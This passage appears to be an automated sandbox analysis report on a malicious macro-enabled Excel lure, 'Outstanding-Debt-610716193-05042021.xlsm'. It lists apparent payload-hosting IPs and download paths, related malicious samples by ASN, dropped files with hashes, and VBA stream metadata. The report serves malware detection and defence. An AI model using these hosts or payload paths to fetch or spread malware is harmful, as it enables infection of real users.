
                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                185.183.99.115Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115/44313,6048108796.dat
                                                                                                                                                51.89.73.159Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159/44313,6048108796.dat
                                                                                                                                                190.14.37.38Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38/44313,6048108796.dat

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                OffshoreRacksSAPAOutstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38
                                                                                                                                                Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Cancellation-419022185-04292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.27
                                                                                                                                                Cancellation-419022185-04292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.27
                                                                                                                                                Cancellation-419022185-04292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.27
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.252
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.252
                                                                                                                                                HSAEOutstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115
                                                                                                                                                Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.45.193.80
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.45.193.80
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.45.193.80
                                                                                                                                                24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.198.57.121
                                                                                                                                                24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.198.57.121
                                                                                                                                                24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.198.57.121
                                                                                                                                                kVXWdr5oFQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.36
                                                                                                                                                t.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.141.27.225
                                                                                                                                                SSuPgxqQBv.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.36
                                                                                                                                                sGdpcwaC54.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.147
                                                                                                                                                sGdpcwaC54.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.147
                                                                                                                                                ccriZ1jd8H.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.147
                                                                                                                                                SecuriteInfo.com.Trojan.GenericKD.36392080.3322.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.156
                                                                                                                                                0304_87496944093261.docGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                0304_56958375050481.docGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                Static.dllGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                Static.dllGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                OVHFRpd9EeXdsQtNb3dQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 66.70.204.222
                                                                                                                                                Invoice No F1019855_PDF.vbsGet hashmaliciousBrowse
                                                                                                                                                • 79.137.109.121
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159
                                                                                                                                                SecuriteInfo.com.W32.MSIL_Troj.ASI.genEldorado.27642.exeGet hashmaliciousBrowse
                                                                                                                                                • 66.70.204.222
                                                                                                                                                Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159
                                                                                                                                                New Order Request_0232147.exeGet hashmaliciousBrowse
                                                                                                                                                • 149.202.85.210
                                                                                                                                                Transcation03232016646pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 79.137.109.121
                                                                                                                                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.77.73.218
                                                                                                                                                MZyeln5mSFOjxMx.exeGet hashmaliciousBrowse
                                                                                                                                                • 66.70.204.222
                                                                                                                                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.77.73.218
                                                                                                                                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.77.73.218
                                                                                                                                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                94765446_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                d192feb6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\16773A9D-D37D-4540-9494-50C371665E6B
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):134558
                                                                                                                                                Entropy (8bit):5.368374627036288
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:DcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:wEQ9DQW+zPXO8
                                                                                                                                                MD5:B7FB2DE7D5FA7C4A4BC039DEBB7A0EE3
                                                                                                                                                SHA1:B620BFCB95BA6114AABF6399591BBDF416176F3E
                                                                                                                                                SHA-256:7ED0856D2CA580EC6F66601A55C0CFB0A8E3E74DE5BDEF89A12E0C18DD33AFAF
                                                                                                                                                SHA-512:41738C15CA0400EF1D1048CF2AFC25A773536A8E1CB5D7B923142762F79A12BB969937E10EC6C002C1759E976108F8B1952E337B5A4BB5E9891A92156B2D56C3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T17:20:00">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\93B95D04.jpg
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92379
                                                                                                                                                Entropy (8bit):7.654577060340879
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
                                                                                                                                                MD5:4A425E6A5A885C0D0E2589506FD2244B
                                                                                                                                                SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
                                                                                                                                                SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
                                                                                                                                                SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
                                                                                                                                                C:\Users\user\AppData\Local\Temp\0AC10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119823
                                                                                                                                                Entropy (8bit):7.69870686061061
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:2nq5vKINbjvw548LMb/oqKO8NnS8+60KcE:2nq4AbT648LM7D98Np+Er
                                                                                                                                                MD5:CA56B3A4B608992554A6E969D838BCA7
                                                                                                                                                SHA1:B25F5AE6DBD8BD069FC0E4A8A7DF30DDE1D18CED
                                                                                                                                                SHA-256:EDE8309F597DFF9FF9421B715CD6EDC2C280E310269B32CD585C438327C8610C
                                                                                                                                                SHA-512:24B535BD38CD736CA56085EAB088807F00BF00ADC04D50E36B97F381C8264C326373B999104D49EEEC1462F48ECD3B5AF0BB7765BE659F3C5C57C4978CCF35AE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):170164
                                                                                                                                                Entropy (8bit):4.362842257315497
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:fWYvzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fxM8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                MD5:3A471E051D7E8188F4B8786106769E00
                                                                                                                                                SHA1:84A684E049A353767FF6099102213237ABE97178
                                                                                                                                                SHA-256:2F1EC8124A69EEA0B1F480DE744959A925366150BF73D711166B5608EA0D6E8A
                                                                                                                                                SHA-512:FECF899F8C6C8703DC1C31B04515C42B36AA90DA89ABE79035AF83B3D26052283CE65E4A51322682A014A61F7275C22DC18590EE6D6FA711B2D05D50EA0B1526
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed May 5 01:20:08 2021, atime=Wed May 5 01:20:08 2021, length=12288, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):904
                                                                                                                                                Entropy (8bit):4.639930163545324
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8uXU9ANuElPCH2agSMuYwlLFLWF+WrjAZ/2bD/LC5Lu4t2Y+xIBjKZm:8OKgSM2LIAZiD+87aB6m
                                                                                                                                                MD5:1D8C62959AA12E4B55742E4515A80473
                                                                                                                                                SHA1:087876F3239860D6998FB6401018A7C379895AAC
                                                                                                                                                SHA-256:AE8668E18B2EB021103760FC202399F92C288797C7C80795738C745BEE2FD792
                                                                                                                                                SHA-512:0A5BF86A7F04984AF86D53EFDBDAC73DA9CC8465D2439763DBAF8AB225674CAA9D674740F48AE47B40697B731387E960EABDE7F5BCA42F759740730A5CA90DBE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F........N....-...5e+UA...5e+UA...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rs.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qzx..user.<.......Ny..Rs......S........................h.a.r.d.z.....~.1......R....Desktop.h.......Ny..R.......Y..............>......^..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......035347...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-610716193-05042021.xlsm.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:48 2020, mtime=Wed May 5 01:20:08 2021, atime=Wed May 5 01:20:08 2021, length=119809, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2370
                                                                                                                                                Entropy (8bit):4.710973493924096
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8T42mH7k8Z0h+sB6pT42mH7k8Z0h+sB6:8T42mbrqFKT42mbrqF
                                                                                                                                                MD5:B96B0818C1B13B39F4A35E9E79D55228
                                                                                                                                                SHA1:4AE3D6FD52BF5DE5FAE7B8FA2CB0B6DA5CA2EDDC
                                                                                                                                                SHA-256:7F0F1367787B9D6F94A4DBC426961B35A7EE4F963E870377207A63795027CABC
                                                                                                                                                SHA-512:EF87F20DF3B730FCD9CB0F75C8E6F4258BC26127F2185793756F56303EE0B462FED8A9B90990317A2334AF09258329B61585AFEE2F19ACF89290C023A5D61D25
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ...^.Q.:...s.n+UA..8]l+UA...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rs.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qzx..user.<.......Ny..Rs......S........................h.a.r.d.z.....~.1.....>Q{x..Desktop.h.......Ny..Rs......Y..............>......Z.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....Ry. .OUTSTA~1.XLS.........>Qyx.Ry.....h.......................).O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.6.1.0.7.1.6.1.9.3.-.0.5.0.4.2.0.2.1...x.l.s.m.......n...............-.......m...........>.S......C:\Users\user\Desktop\Outstanding-Debt-610716193-05042021.xlsm..?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.6.1.0.7.1.6.1.9.3.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......035347...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):175
                                                                                                                                                Entropy (8bit):4.973893060766468
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:oyBVomxWhl2BcYYnHRF+lpSyEW92BcYYnHRF+lpSmxWhl2BcYYnHRF+lpSv:djSltrnHRcpoW9trnHRcpsltrnHRcpc
                                                                                                                                                MD5:7B226ABAFBF8417DED983B5197228EFE
                                                                                                                                                SHA1:99024F8273231EF25D13383DDF969C186BA7569B
                                                                                                                                                SHA-256:5F7F840EFFF6F37B0844216F1E1EBA7F964EC77A820DC7D3F6580C77C61AA243
                                                                                                                                                SHA-512:D262DDF8506053BA4CA8C4182F8392AD3764F762B904FE945EC96E9D8631AFF0F120726DCC5E8AA9B50D6B23CE1B1F4114D85E416438E5BBE836CFA42CB40A00
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-610716193-05042021.xlsm.LNK=0..Outstanding-Debt-610716193-05042021.xlsm.LNK=0..[misc]..Outstanding-Debt-610716193-05042021.xlsm.LNK=0..
                                                                                                                                                C:\Users\user\Desktop\FAC10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119809
                                                                                                                                                Entropy (8bit):7.6985553643427185
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:MIbmycHjvKINbjvw548LMb/oqKO8NnS8+60KcX:TcOAbT648LM7D98Np+EQ
                                                                                                                                                MD5:C63AE699FCE4655F9D39D2C1D03CFA44
                                                                                                                                                SHA1:CE5E96CAFA779CAF2DB1114986D41C5074271F76
                                                                                                                                                SHA-256:7CE428814581CAE07D14AA8A1F8F93173AD866B48909AF28230631380C62D8E1
                                                                                                                                                SHA-512:F9EEA7CFD351582521447DCF1DED29077E923FA90F3ACEDDDF21AF18E11DE4A41259D146611017EDE8101652D069E57A0DDD31D1CE6EEEC2F988EC5498E13C89
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\Desktop\~$Outstanding-Debt-610716193-05042021.xlsm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                Entropy (8bit):7.688088272020875
                                                                                                                                                TrID:
                                                                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                File name:Outstanding-Debt-610716193-05042021.xlsm
                                                                                                                                                File size:116888
                                                                                                                                                MD5:b20f59f0dec28c944c62f14fcdeecebb
                                                                                                                                                SHA1:113cdca46cefdbb50697d6f539dcc71bb3a1947a
                                                                                                                                                SHA256:78a9d532ef2c79aa430393c85f8f0351d6fa0578297a7d5d349701670890145b
                                                                                                                                                SHA512:5d0c9c81e1c92e98a70c445b0b9ed5902f7b34ad9c4de5da50a72c982ab4ab7dc957f861a9592016dc100e77ac17838456bd216e2d6c88e784787fd7ce9000fc
                                                                                                                                                SSDEEP:3072:DvKINbjvw548LMb/oqKO8NnS8+60KcplBO:OAbT648LM7D98Np+EeK
                                                                                                                                                File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd0e2f696908c

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OpenXML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/404168/sample/Outstanding-Debt-610716193-05042021.xlsm"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Author:Rabota
                                                                                                                                                Last Saved By:Noped
                                                                                                                                                Create Time:2015-06-05T18:19:34Z
                                                                                                                                                Last Saved Time:2021-05-04T08:05:25Z
                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                Shared Document:false
                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                Application Version:16.0300

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Blasr.bas, Stream Size: 1166
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Blasr
                                                                                                                                                VBA File Name:Blasr.bas
                                                                                                                                                Stream Size:1166
                                                                                                                                                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
